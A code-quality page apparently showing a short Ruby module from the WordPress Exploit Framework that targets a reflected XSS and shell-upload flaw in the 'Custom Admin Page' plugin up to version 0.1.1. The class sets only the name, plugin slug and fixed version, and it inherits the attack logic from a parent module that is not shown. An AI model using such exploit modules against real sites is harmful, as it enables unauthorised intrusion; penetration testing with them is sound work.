rastating/wordpress-exploit-framework

View on GitHub
lib/wpxf/modules/exploit/xss/reflected/custom_admin_page_reflected_xss_shell_upload.rb

Summary

Maintainability
A
0 mins
Test Coverage

# frozen_string_literal: true

class Wpxf::Exploit::CustomAdminPageReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
  def initialize
    super

    update_info(
      name: 'Custom Admin Page <= 0.1.1 Reflected XSS Shell Upload'
    )
  end

  def plugin_name
    'custom-admin-page'
  end

  def fixed_version
    '0.1.1.1'
  end
end